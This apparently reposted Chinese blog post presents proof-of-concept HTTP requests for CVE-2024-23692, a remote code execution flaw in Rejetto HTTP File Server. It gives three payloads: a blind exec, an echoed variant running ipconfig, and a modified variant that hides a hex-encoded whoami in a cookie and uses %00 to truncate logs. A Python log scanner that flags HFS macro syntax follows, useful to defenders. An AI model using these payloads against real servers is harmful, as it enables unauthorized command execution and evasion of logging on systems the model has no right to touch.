[CVE-2024-23692] (HFS) Rejetto HTTP File Server RC...
There are currently two main PoCs in circulation:
1. No echo (blind)
GET /?search=%25V%25url%25:%host%}{.exec|winver.}{.break.} HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Host:
Connection: close
2. With echo (command output returned)
GET /?n=%0A&cmd=ipconfig&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Edg/125.0.0.0
Connection: close
Using %00 to truncate the echoed log:
Simplified modification that uses a built-in parameter and the Cookie to hide execution
GET /?sort=%0a%00&search=%25V%25url%25:%host%}{.exec|{.?a.}{.cookie|HFS_SID_.}|out=res.}{.^res.} HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.81 Safari/537.36
Host:
Cookie: HFS_SID_=%77%68%6f%61%6d%69
Connection: close
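For defenders, all three requests above carry the same signature in the query string: HFS macro syntax (`{.name|...}`) together with the `%url%` symbol. The log check below is an added example, not code from the original post; the access-log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MACRO_NAME = re.compile(r"\{\.([^|.{}]+)")  # name that follows a "{." opener

def inspect_target(target):
    """Return (tags, macro_names) for one request target (path?query)."""
    query = unquote(target.partition("?")[2])  # decode once before matching
    macros = [name.strip().lower() for name in MACRO_NAME.findall(query)]
    tags = []
    if "exec" in macros:
        tags.append("exec-macro")      # command execution macro requested
    elif macros:
        tags.append("macro-syntax")    # template syntax has no place in a query
    if macros and "%url%" in query.lower():
        tags.append("url-symbol")      # the %url% symbol used in search=
    if "\x00" in query:
        tags.append("null-byte")       # %00 truncation seen in the requests above
    return tags, macros

def scan(lines):
    """Return (line_number, tags, macro_names) for each suspicious log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            tags, macros = inspect_target(match.group(1))
            if tags:
                hits.append((number, tags, macros))
    return hits

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2024:10:00:01 +0000] "GET /?search=report HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jul/2024:10:02:13 +0000] '
    '"GET /?search=%25V%25url%25:%host%}{.exec|winver.}{.break.} HTTP/1.1" 200 310',
    # Same shape as the Cookie variant, with braces and pipes percent-encoded.
    '203.0.113.7 - - [01/Jul/2024:10:02:40 +0000] '
    '"GET /?sort=%0a%00&search=%25V%25url%25:%host%%7D%7B.exec%7C%7B.?a.%7D'
    '%7B.cookie%7CHFS_SID_.%7D%7Cout=res.%7D%7B.^res.%7D HTTP/1.1" 200 12',
    '192.0.2.10 - - [01/Jul/2024:10:05:09 +0000] "GET /files/?search=100%25 HTTP/1.1" 200 901',
]

if __name__ == "__main__":
    for number, tags, macros in scan(SAMPLE_LOG):
        print(f"line {number}: {','.join(tags)} macros={macros}")
```

Because the Cookie variant moves the command text out of the URL, the check matches on the macro syntax itself and not on command names; common access-log formats do not record the Cookie header.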
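Copyright notice: unless otherwise noted, all articles here are original works of 《CM部落》; please retain the article source when reposting.
Article link: [CVE-2024-23692] (HFS) Rejetto HTTP File Server RCE Payload Modification https://www.itkz.cn/note/145.html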